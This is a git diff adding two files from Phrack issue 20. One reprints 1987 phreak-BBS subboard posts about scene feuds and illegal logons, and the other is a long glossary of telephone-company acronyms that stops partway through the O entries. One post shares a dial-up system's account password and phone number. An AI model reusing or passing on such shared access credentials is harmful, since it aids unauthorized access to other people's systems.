+
+
+                                      ^*^
+=========================================================================
diff --git a/phrack20/10.txt b/phrack20/10.txt
new file mode 100644
index 0000000..c694e72
--- /dev/null
+++ b/phrack20/10.txt
@@ -0,0 +1,94 @@
+                                ==Phrack Inc.==
+
+                     Volume Two, Issue 20, File 10 of 12
+
+
+                      Metal Shop Private's -- Royal Court
+                      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+The Royal Court was an idea of Knight Lightning's who ran the subboard.  It was
+sort of like an "elite" subboard for people who he liked and thought knew a bit
+to contribute to the subboard's conversation.  Many of the messages here were
+deleted because of the "date-to-deletion" feature of the board and having most
+of the messages that filled this subboard being clustered in one period a while
+ago.
+
+
+1/6: 201 DDial...
+Name: Taran King 1
+Date: 9:17 pm  Sun Apr 26, 1987
+
+For those who were using that Flash-Talk Diversi-Dial that Sluggo supplied,
+the account password changed...It is now 112 611 165 and the phone number is
+still 201-743-4850.  Sort of something to do with your absolutely-nothing-to
+-do-time.  Later
+-TK
+
+
+2/6: Back Again.
+Name: High Evolutionary 28
+Date: 1:08 am  Thu Apr 30, 1987
+
+Hello, Isn't it funny.. I plan to call boards again and again because I get a
+little free time on my hands. But then, when I start, something else comes up.
+I should stop babbling.. I am probably boooring you.
+
+For apparent lack of discussion here, could someone maybe fill me in on what
+has been happening lately in the phreak/hack society? I've yet to get the past
+few PWNs.
+
+  -High Evolutionary
+  -Tok
+
+
+3/6: High
+Name: Knight Lightning 2
+Date: 7:06 pm  Thu Apr 30, 1987
+
+In general, SummerCon is the big thing that people are talking about.  There
+is also some new disputes and controversy about the return of Oryan Quest and
+his "supposed" running away from home.
+
+:Knight Lightning
+
+
+4/6: Ah..
+Name: High Evolutionary 28
+Date: 11:58 pm  Fri May 01, 1987
+
+  KL, I've also heard that some serious wars are being waged w/ OQ or
+something to that extent...Mind explaining it to me?
+
+   Evolutionary
+
+
+5/6: Wars?
+Name: Knight Lightning 2
+Date: 10:20 am  Sat May 02, 1987
+
+As far as I know, there are no wars currently in progress but in the past,
+Oryan QUEST went and did MBs on Doc Holiday, The Executioner, and both of
+Taran King's phone lines.  He has also repeatedly tried to gain illegal access
+on this system and somehow got Nate to help him do it.  Then he has proceeded
+to harass MSP members about their posts.  However, if there is a war, it is
+one sided because everyone is pretty much ignoring Quest.
+
+Hmm... I wonder why my account had 4 illegal logons...?
+
+:Knight Lightning
+
+
+6/6: Logons
+Name: Taran King 1
+Date: 10:29 am  Sat May 02, 1987
+
+Those illegal logons that most of you LOD type people will experience when
+logging on were probably not QUEST.  I've got an idea and I suppose most of
+you might too, but I'm not concerned with it.
+-TK
+
+
+Post on Royal Court? No
+
+                                      ^*^
+=========================================================================
diff --git a/phrack20/11.txt b/phrack20/11.txt
new file mode 100644
index 0000000..5cc8362
--- /dev/null
+++ b/phrack20/11.txt
@@ -0,0 +1,1297 @@
+                                ==Phrack Inc.==
+
+                     Volume Two, Issue 20, File 11 of 12
+
+
+                       Metal Shop Private's -- Acronyms
+                       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+3ACC  3A Central Control
+5XB COER  5 X-Bar Central Office Equipment Reports system
+A/D  Analog to Digital
+AAX  Automated Attendant eXchange
+ABATS  Automatic Bit Access Test System
+ABHC  Average Busy Hour Calls
+ABS  Alternative Billing Service
+ABSBH  Average Busy Season Busy Hour
+ACB  Annoyance Call Bureau
+ACC  Audio Communications Controller
+ACCS  Automated Calling Card Service
+ACD  Automatic Call Distributor
+ACDA  Automatic Call Disposition Analyzer
+ACE  Automatic Calling Equipment
+ACF  Advanced Communications Functions
+ACH  Attempt per Circuit per Hour
+ACOF  Attendant Control Of Facilities
+ACP  ACtion Point
+ACSNET  Acedemic Computing Services NETwork
+ACSU  Advanced t-1 Channel Service Unit
+ACTS  Automated Coin Toll Service
+ACU  Alarm Control Unit
+ACU  Automatic Calling Unit
+ADCCP  Advanced Data Communications Control Procedure
+ADCI  Automatic Display Call Indicator
+ADN  Abbreviated Dialing Number
+ADS  Advanced Digital System
+ADS  Audio Distribution System
+ADS  Auxilary Data System
+AFACTS  Automatic FACilities Test System
+AFADS  Automatic Force Adjustment Data System
+AFSK  Automatic Frequency Shift Keying
+AIC  Automatic Intercept Center
+AICC  Automatic Intercept Communications Controller
+AIOD  Automatic Identificated Outward Dialing
+AIS  Automatic Intercept System
+ALBO  Automatic Line BuildOut
+ALFE  Analog Line Front End
+ALGOL  ALGOrhythmic computer Language
+ALI  Automatic Location Indentification
+ALIT  Automatic Line Insulation Testing
+ALRU  Automatic Line Record Update
+ALS  Automated List Service
+AM  Administrative Module
+AM  Amplitude Modulation
+AMA  Automatic Message Accounting
+AMACS  AMA Collection System
+AMARC  AMA Recording Center
+AMASE  AMA Standard Entry
+AMAT  AMA Transmitter
+AMATPS  AMA TeleProcessing System
+AMERITECH  AMERican Information TECHnologies
+AMPS  Advanced Mobile Phone Service
+AN  Associated Number
+ANA  Automatic Number Announcement
+ANC  All Number Calling
+ANI  Automatic Number Identification
+ANIF  Automatic Number Identification Failure
+ANSI  American National Standards Institute
+AOSS  Auxilliary Operator Service System
+AP  Attached Processor
+APC  AMARC Protocol Converter
+APS  Automatic Protection Switch
+AR  Alarm Report
+ARC  Audio Response Controller
+ARIS  Audichron Recorded Information System
+ARS  Alternate Route Selection
+ARSB  Automated Repair Service Bureau
+ARU  Audio Response Unit
+ASCII  American Standard Code for Information Interchange
+ASOC  Administrative Service Oversight Center
+ASPEN  Automatic System for Performance Evaluation of the Network
+AT  Access Tandem
+AT&T  American Telephone and Telegraph
+ATB  All Trunks Busy
+ATC  Automatic Transmission Control
+ATH  Abbreviated Trouble History
+ATI  Automatic Test Inhibit
+ATIS  Automatic Transmitter Identification System
+ATM  Automatic Teller Machine
+ATMS  Automated Trunk Measurement System
+ATP  All Tests Pass
+ATR  Alternate Trunk Routing
+ATRS  Automated Trouble Reporting System
+ATTC  Automatic Transmission Test and Control circuit
+ATTCOM  AT&T COMmunications
+ATTIS  AT&T Information System
+AUDIX  AUDio Information eXchange
+AUTODIN  AUTOmatic DIgital Network
+AUTOSEVCOM  AUTOmatic SEcure Voice COMmunications
+AUTOVON  AUTOmatic VOice Network
+AUXF  AUXillary Frame
+AVD  Alternate Voice Data
+B6ZS  Bipolar with 6 Zero Subsitution
+B911  Basic 911
+BAMAF  BELLCORE AMA Format
+BANCS  Bell Administrative Network Communications System
+BAPCO  Bellsouth Advertising & Publishing COmpany
+BCC  Blocked Call Cleared
+BCD  Binary Coded Decimal
+BCD  Blocked Call Delayed
+BCS  Batch Change Supplement
+BDT  Billing Data Transmitter
+BEF  Band Elimination Filter
+BELLCORE  BELL COmmunications REsearch
+BER  Bit Error Rate
+BERT  Bit Error Rate Test
+BETRS  Basic Exchange Telecommunications Radio Service
+BHC  Busy Hour Calls
+BISP  Business Information System Program
+BITNET  Because-It's-Time NETwork
+BL/DS  Busy Line/Don't Answer
+BLF  Busy Line Field
+BLS  Business Listing Service
+BLV  Busy Line Verification
+BNS  Billed Number Screening
+BOC  Bell Operating Company
+BOR  Basic Output Report
+BORSCHT  Battery, Overvoltage, Ringing, Supervision, Coding, Hybrid Test
+ing
+BOS  Business Office Supervisor
+BOSS  Billing and Order Support System
+BOT  Beginning Of Tape
+BPI  Bits Per Inch
+BPOC  Bell Point Of Contact
+BPS  Bits Per Second
+BPSS  Basic Packet-Switching Service
+BRAT  Business Residence Account Tracking system
+BRCS  Business Residence Custom Service
+BRI  Basic Rate Interface
+BRM  Basic Remote Module
+BS  Banded Signaling
+BSA  Basic Serving Arrangements
+BSBH  Busy Season Busy Hour
+BSC  Business Service Center
+BSCM  BiSynchronous Communications Module
+BSE  Basic Service Elements
+BSF  Bell Shock Force
+BSOC  Bell Systems Operating Company
+BSP  Bell System Practice
+BSRFS  Bell System Reference Frequency Standard
+BST  Basic Services Terminal
+BSTJ  Bell System Technical Journal
+BT  Bus Terminator
+BTAM  Basic Telecommunications Access Message
+BTL  Bell Telephone Laboratories
+BTN  Billing Telephone Number
+BTU  British Thermal Unit
+BVA  Billing Validation Application
+BVC  Billing Validation Center
+BWM  Broadcast Warning Message
+BWT  Broadcast Warning TWX
+BWTS  BandWidth Test Set
+CA  CAble
+CABS  Carrier Access Billing System
+CAC  Calling-card Authorization Center
+CAC  Carrier Access Code
+CAC  Circuit Administration Center
+CAC  Customer Administration Center
+CAD  Computer-Aided Dispatch
+CADV  Combined Alternate Data/Voice
+CAI  Call Assembly Index
+CAIS  Colocated Automatic Intercept System
+CALRS  Centralized Automatic Loop Reporting System
+CAMA  Centralized Automatic Message Accounting
+CAROT  Centralized Automatic Reporting On Trunks
+CAS  Circuit Associated Signaling
+CAS  Computerized Autodial System
+CAT  Craft Access Terminal
+CATLAS  Centralized Automatic Trouble Locating and Analysis System
+CBS  CrossBar Switching
+CBX  Computerized Branch eXchange
+CC  Central Control
+CC  Common Control
+CC  Country Code
+CCC  Central Control Complex
+CCC  Computer Control Center
+CCH  Connections per Circuit per Hour
+CCIR  Comite' Consultatif International des Radio Communications
+CCIS  Common Channel Interoffice Signaling
+CCITT  Comite' Consultatif International Telegraphique et Telephonique
+CCNC  Common Channel Network Controller
+CCNC  Computer/Communications Network Center
+CCR  Customer-Controlled Reconfiguration
+CCS  Common Channel Signaling
+CCS  Hundred (C) Call Seconds
+CCSA  Common-Control Switching Arrangement
+CCT  Central Control Terminal
+CCTAC  Computer Communications Trouble Analysis Center
+CCU  COLT Computer Unit
+CCV  Calling Card Validation
+CDA  Call Data Accumulator
+CDA  Coin Detection and Announcement
+CDAR  Customer Dialed Account Recording
+CDCF  Cumulative Discounted Cash Flow
+CDF  Combined Distributing Frame
+CDI  Circle Digit Identification
+CDO  Community Dial Office
+CDPR  Customer Dial Pulse Receiver
+CDR  Call Dial Rerouting
+CDS  Craft Dispatch System
+CEF  Cable Entrance Facility
+CEI  Comparably Efficient Interconnection
+CEV  Controlled Environment Vault
+CF  Coin First
+CFCA  Communications Fraud Control Association
+CFR  Code of Federal Regulations
+CGN  Concentrator Group Number
+CIC  Carrier Identification Code
+CICS  Customer Information Control System
+CII  Call Identity Index
+CIS  Customized Intercept Service
+CLASS  Centralized Local Area Selective Signaling
+CLASS  Custom Local Area Signaling Service
+CLDN  Calling Line Directory Number
+CLEI  Common-Language Equipment Identification
+CLI  Calling Line Ident
+CLID  Calling Line IDentification
+CLLI  Common-Language Location Identification
+CMAC  Centralized Maintenance and Administration Center
+CMC  Construction Maintenance Center
+CMDF  Combined Main Distributing Frame
+CMDS  Centralized Message Data System
+CMS  Call Management System
+CMS  Circuit Maintenance System
+CMS  Communications Management Subsystem
+CMS  Conversational Monitoring System
+CMT  Cellular Mobile Telephone
+CMU  COLT Measurement Unit
+CN  Change Notice
+CN/A  Customer Name/Address
+CNA  Communications Network Application
+CNAB  Customer Name/Address Bureau
+CNCC  Customer Network Control Center
+CNI  Common Network Interface
+CNMS  Cylink Network Management System
+CNS  Complimentary Network Service
+CO  Central Office
+COAM  Customer Owned And Maintained
+COC  Circuit Order Control
+COCOT  Customer-Owned Coin-Operated Telephone
+CODCF  Central Office Data Connecting Facility
+CODEC  COder-DECoder
+COE  Central Office Equipment
+COEES  COE Engineering System
+COLT  Central Office Line Tester
+COMSAT  COMmunications SATellite
+CONN  CONNector
+CONTAC  Central Office NeTwork ACcess
+CONUS  CONtinental United States
+CORNET  CORperate NETwork
+COSMIC  COmmon Systems Main InterConnection frame system
+COSMOS  COmputerized System for Mainframe OperationS
+COT  Central Office Terminal
+CP  Control Program
+CPC  Cellular Phone Company
+CPC  Circuit Provisioning Center
+CPD  Central Pulse Distributor
+CPE  Customer-Premises Equipment
+CPH  Cost Per Hour
+CPI  Computer Private branch exchange Interface
+CPM  Cost Per Minute
+CPMP  Carrier Performance Measurement Plan
+CPU  Central Processing Unit
+CRAS  Cable Repair Administrative System
+CRC  Customer Record Center
+CRC  Cyclic Redundancy Check
+CREG  Concentrated Range Extension with Gain
+CRFMP  Cable Repair Force Management Plan
+CRIS  Customer Record Information System
+CRS  Centralized Results System
+CRSAB  Centralized Repair Service Answering Bureau
+CRT  Cathode Ray Tube
+CSA  Carrier Serving Area
+CSACC  Customer Service Administration Control Center
+CSAR  Centralized System for Analysis Reporting
+CSC  Cell Site Controller
+CSDC  Circuit Switched Digital Capability
+CSNET  Computer Science NETwork
+CSO  Central Services Organization
+CSS  Computer Sub-System
+CSU  Channel Service Unit
+CTC  Central Test Center
+CTM  Contac Trunk Module
+CTMS  Carrier Transmission Measuring System
+CTO  Call Transfer Outside
+CTSS  Cray Time Sharing System
+CTT  Cartridge Tape Transport
+CTTC  Cartridge Tape Transport Controller
+CTTN  Cable Trunk Ticket Number
+CU  Control Unit
+CU  Customer Unit
+CU/TK  Common Update/EQuipment system
+CUCRIT  Capital Utilization CRITeria
+CVR  Compass Voice Response
+CWC  City-Wide Centrex
+D/A  Digital to Analog
+DA  Directory Assistance
+DACS  Digital Access Cross-connect System
+DACS  Directory Assistance Charging System
+DAIS  Distributed Automatic Intercept System
+DARC  Division Alarm Recording Center
+DARU  Distributed automatic intercept system Audio Response Unit
+DAS  Directory Assistance System
+DAS  Distributor And Scanner
+DAS-WDT  Distributor And Scanner-Watch Dog Timer
+DASD  Direct Access Storage Device
+DAV  Data Above Voice
+DB  Decibel
+DBA  Data Base Administrator
+DBAC  Data Base Administration Center
+DBAS  Data Base Administration System
+DBM  DataBase Manager
+DBS  Duplex Bus Selector
+DCCS  DisContiguous Shared Segments
+DCE  Data Circuit-terminating Equipment
+DCH  D Channel Handler
+DCL  DEC Control Language
+DCLU  Digital Carrier Line Uint
+DCM  Digital Carrier Module
+DCMS  Distributed Call Measurement System
+DCMU  Digital Concentrator Measurement Unit
+DCP  Duplex Central Processor
+DCPR  Detailed Contuing Property Record (PICS/DCPR)
+DCPSK  Differential Coherent Phase-Shift Keying
+DCS  Digital Crosconnect System
+DCT  Digital Carrier Trunk
+DCTN  Defense Commercial Telecommunications Network
+DCTS  Dimension Custom Telephone Service
+DDC  Direct Department Calling
+DDD  Direct Distance Dialing
+DDN  Defense Data Network
+DDS  Digital Data Service
+DDS  Digital Data System
+DDS  Digital Dataphone Service
+DDX  Distributed Data eXchange
+DEC  Digital Equipment Corporation
+DERP  Defective Equipment Replacement Program
+DES  Data Encryption Standard
+DEW  Distant Early Warning (line)
+DFI  Digital Facility Interface
+DFMS  Digital Facility Management System
+DIC  Digital Interface Controller
+DID  Direct Inward Dialing
+DIF  Digital Interface Frame
+DIM  Data In the Middle
+DIP  Dual In-line Package
+DISA  Direct Inward System Access
+DIU  Digital Interface Unit
+DLC  Digital Loop Carrier
+DLCU  Digital Line Carrier Unit
+DLL  Dial Long Lines
+DLS  Digital Link Service
+DLTU  Digital Line/Trunk Unit
+DLU-PG  Digital Line Unit-Pair Gain
+DM  Delta Modulation
+DMA  Direct Memory Access
+DMI  Digital Multiplexed Interface
+DML  Data Manipulation Logic
+DMS  Data Management System
+DMS  Digital Multiplexed System
+DMU  Data Manipulation Unit
+DN  Directory Number
+DNC  Dynamic Network Controller
+DNHR  Dynamic Non Hierarchical Routing
+DNIC  Data Network Identification Code
+DNR  Dialed Number Recorder
+DNX  Dynamic Network X-connect
+DOC  Dynamic Overload Control
+DOCS  Display Operator Console System
+DOJ  Department Of Justice
+DOM  Data On Master group
+DOTS  Digital Office Timing Supply
+DOV  Data Over Voice
+DP  Demarcation Point
+DP  Dial Pulse
+DPAC  Dedicated Plant Assignment Center
+DPC  Destination Point Code
+DPE  Data Path Extender
+DPN-PH  Data Packet Network-Packet Handler
+DPP  Discounted Payback Period
+DPSK  Differential Phased-Shift Keying
+DR  Data Ready
+DR  Data Receive
+DRMU  Digital Remote Measurement Unit
+DS  Digital carrier Span
+DS  Digital Signal
+DS  Direct Signal
+DSBAM  Double-SideBand Amplitude Module
+DSDC  Direct Service Dial Capability
+DSI  Digital Speech Interpolation
+DSN  Digital Signal (level) N
+DSP  Digital Signal Processor
+DSR  Dynamic Service Register
+DSS  Data Station Selector
+DSU  Data Service Unit
+DSX  Digital System X-connect
+DT  Data Transmit
+DT  Di-group Terminal
+DTAS  Digital Test Access System
+DTC  Di-group Terminal Controller
+DTC  Digital Trunk Controller
+DTE  Data Terminal Equipment
+DTF  Dial Tone First
+DTG  Direct Trunk Group
+DTIF  Digital Transmission Interface Frame
+DTMF  Dual Tone Multi Frequency
+DTU  Di-group Terminal Unit
+DUV  Data Under Voice
+DVX  Digital Voice eXchange
+E&M  rEceive & transMit/Ear & Mouth signaling
+E-COM  Electronic Computer Originated Mail
+E911  Enhanced 911
+EADAS  Engineering and Administrative Data Acquisition System
+EADAS/NM  EADAS/Network Management
+EAEO  Equal Access End Office
+EARN  European Academic Research Network
+EAS  Extended Announcement System
+EAS  Extended Area Service
+EASD  Equal Access Service Date
+EBCDIC  Extended Binary Coded Decimal Interexchange Code
+ECAP  Electronic Customer Access Program
+ECC  Enter Cable Change
+ECCS  Economic C (hundred) Call Seconds
+ECF  Enhanced Connectivity Facility
+ECPT  Electronic Coin Public Telephone
+ECS  Electronic Crosconnect System
+EDAC  Electromechanical Digital Adapter Circuit
+EDI  Electronic Data Interchange
+EDP  Electronic Data Processing
+EDSX  Electronic Digital Signal X-connect
+EECT  End-to-End Call Trace
+EEDP  Expanded Electronic tandem switching Dialing Plan
+EEHO  Either End Hop Off
+EEI  Equipment-to-Equipment Interface
+EFRAP  Electronic Feeder Route Analysis Program
+EIA  Electronics Industries Assotiation
+EIS  Expanded Inband Signaling
+EISS  Economic Impact Study System
+EKTS  Electronic Key Telephone Sets
+EML  Expected Measured Loss
+EMS  Expanded Memory Specification
+ENFIA  Exchange Network Facility for Interstate Access
+EO  End Office
+EOE  Electronic Order Exchange
+EOS  Extended Operating System
+EOTT  End Office Toll Trunking
+EPL  Electronic switching system Program Language
+EPROM  Erasable Programmable Read-Only Memory
+EPSCS  Enhanced Private Switched Communication Service
+ER  Error Register
+ERAR  Error Return Address Register
+EREP  Environmental Recording Editing and Printing
+ERL  Echo Return Loss
+ERP  Effective Radiated Power
+ERU  Error Return address Update
+ESAC  Electronic Surveillance Assistance Center
+ESB  Emergency Service Bureau
+ESF  Extended SuperFrame
+ESL  Emergency Stand-Alone
+ESN  Electronic Serial Number
+ESN  Electronic Switched Network
+ESP  Enhanced Service Provider
+ESS  Electronic Switching System
+ESSX  Electronic Switching Systen eXchange
+ETAS  Emergency Technical ASsistance
+ETF  Electronic Toll Fraud
+ETN  Electronic Tandem Network
+ETS  Electronic Tandem Switching
+ETS  Electronic Translation System
+ETSACI  Electronic Tandem Switching Adminstration Channel Interface
+ETSSP  ETS Status Panel
+FA  Fuse Alarm
+FACS  Facilities Assignment and Control System
+FAR  Federal Acquisition Regulation
+FAST  First Application System Test
+FAT  File Allocation Table
+FCAP  Facility CAPacity
+FCC  Federal Communications Commission
+FCC  Forward Command Channel
+FCG  False Cross or Ground
+FCS  File Control Systemction
+FCS  Frame Check Sequence
+FDM  Frequency-Division Multiplexing
+FDP  Field Development Program
+FDX  Full DupleX
+FED  Far End Data
+FEMF  Foreign Electro-Motive Force
+FEPS  Facility and Equipment Planning System
+FEV  Far End Voice
+FGA  Feature Group A
+FGB  Feature Group B
+FGC  Feature Group C
+FGD  Feature Group D
+FIFO  First In, First Out
+FIOC  Frame Input/Output Controller
+FIP  Facility Interface Processor
+FIPS  Federal Information Processing Standards
+FM  Frequency Modulation
+FMAC  Facility Maintenance And Control
+FNPA  Foreign Numbering Plan Area
+FOC  Fiber Optic Communications
+FON  Fiber Optics Network
+FR  Flat Rate
+FRS  Flexible Route Selection
+FSK  Frequency Shift Keying
+FTG  Final Trunk Group
+FTP  File Transfer Protocol
+FTS  Federal Telecommunications System
+FX  Foreign eXchange
+GBS  Group Bridging Service
+GCS  Group Control System
+GEISCO  General Electric Information Services COmpany
+GHZ  GigaHertZ
+GID  Group ID
+GND  GrouND
+GOS  Grade Of Service
+GP  Group Processor
+GPIB  General Purpose Interface Bus
+GRD  GRounD
+GRP MOD  GRouP MODulator
+GSA  General Services Administration
+GSAT  General telephone and electronics SATellite corporation
+GTC  General Telephone Company
+GTE  General Telephone Electronics
+GTT  Global Title Transmission
+HCSDS  High-Capacity Satellite Digital Service
+HCTDS  High-Capacity Terrestrial Digital Service
+HDLC  High-level Data Link Control
+HDTV  High Definition TV
+HDX  Half DupleX
+HEAP  Home Energy Assistance Program
+HEHO  High End Hop Off
+HIC  Hybrid Integrated Circuit
+HNPA  Home Numbering Plan Area
+HNS  Hospitality Network Service
+HOBIC  HOtel Billing Information Center
+HOBIS  HOtel Billing Information System
+HP  Hewlett-Packard
+HPO  High Performance Option
+HSSDS  High-Speed Switched Digital Service
+HU  High Usage
+HUTG  High Usage Trunk Group
+HZ  HertZ
+I&M  Installation & Maintenance
+I/O  Input/Output
+IB  Instruction Buffer
+IBN  Integrated Business Network
+IC  Independent Carrier
+IC  Inter-exchange Carrier
+IC  Inter-LATA Carrier
+ICAN  Individual Circuit ANalysis
+ICC  Interstate Commerce Commission
+ICD  Interactive Call Distribution
+ICLID  Individual Calling Line ID
+ICM  Integrated Call Management
+ICSC  Inter-LATA Customer Service Center
+IDDD  International Direct Distance Dialing
+IDF  Intermediate Distributing Frame
+IDS  Internal Directory System
+IDVC  Integrated Data/Voice Channel
+IEEE  Institute of Electrical and Electronics Engineers
+IF  Intermediate Frequency
+IFRPS  Intercity Facility Relief Planning System
+IIN  Integrated Information Network
+IM  Interface Module
+IMAS  Integrated Mass Announcement System
+IMM  Input Message Manual
+IMT  Inter-Machine Trunk
+IMTS  Improved Mobile Telephone Service
+IN  Intelligent Network
+INC  InterNational Carrier
+INL  Inter Node Link
+INN  Inter Node Network
+INTELSAT  INternational TELecommunications SATellite consortium
+INWATS  INward Wide Area Telephone Service
+IO  Inward Operator
+IOC  Input/Output Controller
+IOCC  International Overseas Completion Center
+IOP  Input-Output Processor
+IOT  Inter-Office Trunk
+IP  Information Provider
+IPCS  Interactive Problem Control System
+IPL  Initial Program Load
+IPLAN  Integrated PLanning And Analysis
+IPM  Impulses Per Minute
+IPM  Interruptions Per Minute
+IPX  Integrated Packet eXchange
+IRC  International Record Carrier
+IROR  Internal Rate Of Return
+IS  Interrupt Set
+ISC  International Switching Center
+ISDN  Integrated Service Digital Network
+ISLM  Integrated Services Line Module
+ISLU  Integrated Services Line Unit
+ISN  Information Systems Network
+ISN  Integrated Systems Network
+ISO  International Organization for Standardization
+ISS  Integrated Switching System
+ISSN  Integrated Special Services Network
+ISUP  Integrated Services User Part
+ITS  Institute of Telecommunication Science
+ITSO  Incoming Trunk Service Observation
+ITU  International Telecommunications Union
+IVP  Installation Verification Program
+IVTS  International Video Teleconferencing Service
+IX  Interactive eXecutive
+IXM  IntereXchange Mileage
+JCL  Job Control Language
+JES  Job Entry System
+JIM  Job Information Memorandum
+JMX  Jumbogroup MultipleX
+JSN  Junction Switch Number
+JSW  Junctor SWitch
+K  Kilobit
+KBPS  KiloBits Per Second
+KDT  Keyboard Display Terminal
+KFT  KiloFeeT
+KHZ  KiloHertZ
+KP  Key Pulse
+KSR  Keyboard Send-Receive
+KTS  Key Telephone Set
+KTS  Key Telephone System
+LAC  Loop Assignment Center
+LADT  Local Access Data Transport
+LAIS  Local Automatic Intercept System
+LAMA  Local Automatic Message Accounting
+LAN  Local Area Network
+LAP  Link Access Protocol
+LAPD  Link Access Procedure on the D channel
+LASS  Local Area Signaling Service
+LATA  Local Access and Transport Area
+LATIS  Loop Activity Tracking Information System
+LBO  Line Buildout
+LBS  Load Balance System
+LCAMOS  Loop CAble Maintenance Operation System
+LCCIS  Local Common Channel Interoffice Signaling
+LCCL  Line Card CabLe
+LCCLN  Line Card Cable Narrative
+LCDN  Last Called Directory Number
+LCIE  Lightguide Cable Interconnection Equipment
+LCLOC  Line Card LOCation
+LCN  Logical Channel Numbers
+LCR  Least Cost Routing
+LCRMKR  Line Card ReMarKs, Retained
+LCSE  Line Card Service and Equipment
+LCSEN  Line Card Service and Equipment Narrative
+LDMTS  Long Distance Message Telecommunications Service
+LEAS  LATA Equal Access System
+LEC  Local Exchange Carrier
+LED  Light-Emitting Diode
+LENCL  Line Equipment Number CLass
+LF  Line Finder
+LFACS  Loop Facilties Assignment And Control System
+LIFO  Last In, First Out
+LLN  Line Link Network
+LMMS  Local Message Metering System
+LMOS  Loop Maintenace Operations System
+LOC  Local Operating Company
+LOCAP  LOw CAPacitance
+LOF  Lock OFf-line
+LON  Lock ON-line
+LPCDF  Low Profile Combined Distributing Frame
+LRAP  Long Route Analysis Program
+LRC  Longitudal Redundancy Check
+LRS  Line Repeater Station
+LRSS  Long Range Switching Studies
+LSB  Lower Side Band
+LSI  Large-Scale Integrated circuitry
+LSRP  Local Switching Replacement Planning system
+LSS  Loop Switching System
+LSV  Line Status Verifier
+LTAB  Line Test Access Bus
+LTC  Local Test Cabinet
+LTD  Local Test Desk
+LTF  Lightwave Terminating Frame
+LTF  Line Trunk Frame
+LTG  Line Trunk Group
+LTS  Loss Test Set
+LXE  Lightguide eXpress Entry
+M/W  MicroWave
+MA  Maintenance Administrator
+MACBS  Multi-Access Cable Billing System
+MADN  Multiple Access Directory Numbers
+MAN  Metropolitan Area Network
+MAP  Maintenance and Administration Position
+MAPSS  Maintenance & Analysis Plan for Special Services
+MAR  Microprogram Address Register
+MARC  Market Analysis of Revenue and Customers system
+MAS  MAin Store
+MAS  Mass Announcement System
+MASB  MAS Bus
+MASC  MAS Controller
+MASM  MAS Memory
+MATFAP  Metropolitan Area Transmission Facility Analysys Program
+MBPS  MegaBits Per Second
+MCIAS  Multi-Channel Intelligent Announcement System
+MCC  Master Control Center
+MCCS  Mechanized Calling Card Service
+MCH  Maintenance CHannel
+MCHB  Maintenance CHannel Buffer
+MCI  Microwave Communications Incorporated
+MCIAS  Multi-Channel Intercept Announcement System
+MCN  Metropolitan Campus Network
+MCS  Meeting Communications Service
+MCTRAP  Mechanized Customer Trouble Report Analysis Plan
+MDACS  Modular Digital Access Control System
+MDC  Marker Distributor Control
+MDC  Meridian Digital Centrex
+MDF  Main Distribution Frame
+MDU  Marker Decoder Unit
+MDX  Modular Digital eXchange
+MEC  Mobile Equipment Console
+MELD  Mechanized Engineering and Layout for Distributing frames
+MERS  Most Economic Route Selection
+MET  Multibutton Electronic Telephone
+MF  Multi Frequency
+MFENET  Magnetic Fusion Energy NETwork
+MFJ  Modification of Final Judgement
+MFR  Multi-Frequency Receivers
+MFT  Metallic Facility Terminal
+MG  MasterGroup
+MGT  MasterGroup Translator
+MHS  Message Handling System
+MHZ  MegaHertZ
+MICE  Modular Integrated Communications Environment
+MIN  Mobile Identification Number
+MINX  Multimedia Information Network eXchange
+MIR  Micro-Instruction Register
+MIS  Management Information System
+MISCF  MISCellaneous Frame
+MITS  Microcomputer Interactive Test System
+MLC  MiniLine Card
+MLCD  Multi-Line Call Detail
+MLT  Mechanized Loop Testing
+MMC  Minicomputer Maintenance Center
+MMGT  MultiMasterGroup Translator
+MMOC  Minicomputer Maintenance Operations Center
+MMS  Main Memory Status
+MMS  Memory Management System
+MMX  Mastergroup MultipleX
+MODEM  MOdulator-DEModulator
+MOG  Minicomputer Operations Group
+MOS  Metal Oxide Semiconductor
+MP  Multi-Processor
+MPCH  Main Parallel CHannel
+MPOW  Multiple Purpose Operator Workstation
+MPPD  Multi-Purpose Peripheral Device
+MRF  Maintenance Reset Function
+MS  Maintenance State
+MSC  Media Stimulated Calling
+MTF  Master Test Frame,
+MTP  Message Transfer Part
+MTR  Mechanized Time Reporting
+MTS  Message Telecommunications Service
+MTS  Message Telephone Service
+MTS  Mobile Telephone Service
+MTSO  Mobile Telephone Switching Office
+MTU  Maintenance Termination Unit
+MTU  Media Tech Unit
+MTX  Mobile Telephone eXchange
+MU  Message Unit
+MULDEM  MULtiplexer-DEMultiplexer
+MUX  MUltipleX
+MVP  Multiline Variety Package
+MVS  Multiple Virtual Storage
+MW  MultiWink
+MXU  MultipleXer Unit
+NA  Next Address
+NAC  Network Administration Center
+NAG  Network Architecture Group
+NAM  Number Assignment Module
+NAND  Not-AND gate
+NAS  Numerical and Atmospheric Sciences network
+NCC  Network Control Center
+NCCF  Network Communications Control Facility
+NCP  Network Control Point
+NCS  National Communications System
+NCTE  Network Channel-Terminating Equipment
+NDCC  Network Data Collection Center
+NEBS  New Equipment-Building System
+NESAC  National Electronic Switching Assistance Center
+NEXT  Near-End X-Talk
+NHR  Non Hierarchial Routing
+NI  Network Interface
+NM  Network Module
+NMC  Network Management Center
+NNX  Network Numbering eXchange
+NOC  Network Operations Center
+NOCS  Network Operations Center System
+NORGEN  Network Operations Report GENerator
+NOTIS  Network Operator Trouble Information System
+NPA  No Power Alarm
+NPA  Numbering Plan Area
+NPV  Net Present Value
+NSA  National Security Agency
+NSC  Network Service Center
+NSCS  Network Service Center System
+NSEC  Network Switching Engineering Center
+NSFNET  National Science Foundation NETwork
+NSPMP  Network Switching Performance Measurement Plan
+NT  Network Termination
+NT  Northern Telecom
+NTEC  Network Technical Equipment Center
+NTIA  National Telecommunications and Information Agency
+NTS  Network Technical Support
+NTS  Network Test System
+NUA  Network User Address
+NUI  Network User Identification
+NYNEX  New York, New England and the unknown (X)
+O-LTM  Optical Line Terminating Multiplexer
+OASYS  Office Automation SYStem
+OC  Operator Centralization
+OCC  Other Common Carrier
+OCE  Other Common carrier channel Equipment
+OCU  Office Channel Unit
+ODAC  Operations Distribution Administration Center
+ODD  Operator Distance Dialing
+ODDD  Operator Direct Distance Dialing
+ODS  Overhead Data Stream
+OFNPS  Outstate Facility Network Planning System
+OGT  OutGoing Trunk
+OMM  Output Message Manual
+OMPF  Operation and Maintenance Processor Frame
+ONAC  Operations Network Administration Center
